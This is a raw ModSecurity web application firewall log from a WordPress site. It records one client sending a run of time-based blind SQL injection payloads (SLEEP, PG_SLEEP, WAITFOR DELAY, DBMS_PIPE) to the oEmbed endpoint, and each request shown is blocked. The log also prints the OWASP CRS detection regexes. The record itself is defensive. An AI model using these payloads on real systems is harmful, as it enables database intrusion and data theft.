https://investigacionperu.com/contacto/';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jnxeJlWfH1pdny5XBAAAAMY"] [Thu Aug 15 03:21:34.813105 2024] [:error] [pid 31519:tid 139653831137024] [client 141.98.81.52:56608] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/%';SELECT SLEEP(5)#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26jnxeJlWfH1pdny5XBQAAANQ"] [Thu Aug 15 03:21:35.266658 2024] [:error] [pid 31519:tid 139654058071808] [client 141.98.81.52:56610] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/);SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26j3xeJlWfH1pdny5XBgAAAME"] [Thu Aug 15 03:21:35.712938 2024] [:error] [pid 31337:tid 139653915064064] [client 141.98.81.52:56612] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/;SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26j-wCyyCVFXh0DMS2YQAAAIo"] [Thu Aug 15 03:21:36.029200 2024] [:error] [pid 31337:tid 139654024500992] [client 141.98.81.52:56614] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/');SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26kOwCyyCVFXh0DMS2YgAAAIU"] [Thu Aug 15 03:21:36.405920 2024] [:error] [pid 31337:tid 139653923456768] [client 141.98.81.52:56616] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26kOwCyyCVFXh0DMS2YwAAAIk"] [Thu Aug 15 03:21:36.706513 2024] [:error] [pid 31519:tid 139653856315136] [client 141.98.81.52:56618] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: PG_SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/%';SELECT PG_SLEEP(5)--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26kHxeJlWfH1pdny5XBwAAANE"] [Thu Aug 15 03:21:37.222891 2024] [:error] [pid 31335:tid 139653814351616] [client 141.98.81.52:56620] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/);WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26kW0MD5oChETZltkVPAAAABY"] [Thu Aug 15 03:21:37.531126 2024] [:error] [pid 31335:tid 139654049679104] [client 141.98.81.52:56622] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/;WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26kW0MD5oChETZltkVPQAAAAI"] [Thu Aug 15 03:21:37.874577 2024] [:error] [pid 31337:tid 139654032893696] [client 141.98.81.52:56624] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/');WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26kewCyyCVFXh0DMS2ZAAAAIQ"] [Thu Aug 15 03:21:38.177395 2024] [:error] [pid 31519:tid 139653839529728] [client 141.98.81.52:56626] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26knxeJlWfH1pdny5XCAAAANM"] [Thu Aug 15 03:21:38.606637 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:56630] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: WAITFOR DELAY found within ARGS:url: https://investigacionperu.com/contacto/%';WAITFOR DELAY '0:0:5'--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26knxeJlWfH1pdny5XCQAAANc"] [Thu Aug 15 03:21:39.010337 2024] [:error] [pid 31335:tid 139653948634880] [client 141.98.81.52:56632] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/);SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(113)||CHR(87)||CHR(112),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26k20MD5oChETZltkVPgAAAAY"] [Thu Aug 15 03:21:39.397575 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:56634] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(113)||CHR(87)||CHR(112),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26k3xeJlWfH1pdny5XCgAAANI"] [Thu Aug 15 03:21:39.715848 2024] [:error] [pid 31337:tid 139653864707840] [client 141.98.81.52:56636] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/');SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(113)||CHR(87)||CHR(112),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26k-wCyyCVFXh0DMS2ZgAAAJA"] [Thu Aug 15 03:21:40.142694 2024] [:error] [pid 31335:tid 139653906671360] [client 141.98.81.52:56638] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(113)||CHR(87)||CHR(112),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lG0MD5oChETZltkVPwAAAAs"] [Thu Aug 15 03:21:40.560901 2024] [:error] [pid 31519:tid 139653864707840] [client 141.98.81.52:56642] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:url: https://investigacionperu.com/contacto/%';SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(119)||CHR(113)||CHR(87)||CHR(112),5) FROM DUAL--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lHxeJlWfH1pdny5XDAAAANA"] [Thu Aug 15 03:21:41.118800 2024] [:error] [pid 31337:tid 139653805958912] [client 141.98.81.52:56644] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/) AND SLEEP(5) AND (4487=4487"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lewCyyCVFXh0DMS2ZwAAAJc"] [Thu Aug 15 03:21:41.451845 2024] [:error] [pid 31337:tid 139653847922432] [client 141.98.81.52:56646] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/ AND SLEEP(5)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lewCyyCVFXh0DMS2aAAAAJI"] [Thu Aug 15 03:21:41.802043 2024] [:error] [pid 31337:tid 139653822744320] [client 141.98.81.52:56648] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/') AND SLEEP(5) AND ('vHrQ'='vHrQ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lewCyyCVFXh0DMS2aQAAAJU"] [Thu Aug 15 03:21:42.194270 2024] [:error] [pid 31337:tid 139653931849472] [client 141.98.81.52:56650] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/' AND SLEEP(5) AND 'utZn'='utZn"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26luwCyyCVFXh0DMS2agAAAIg"] [Thu Aug 15 03:21:42.634546 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:56652] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:url. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:url: https://investigacionperu.com/contacto/%' AND SLEEP(5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr26lnxeJlWfH1pdny5XDQAAAMw"] [Thu Aug 15 03:21:42.890297 2024] [:error] [pid 31335:tid 139653822744320] [client 141.98.81.52:56654] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match 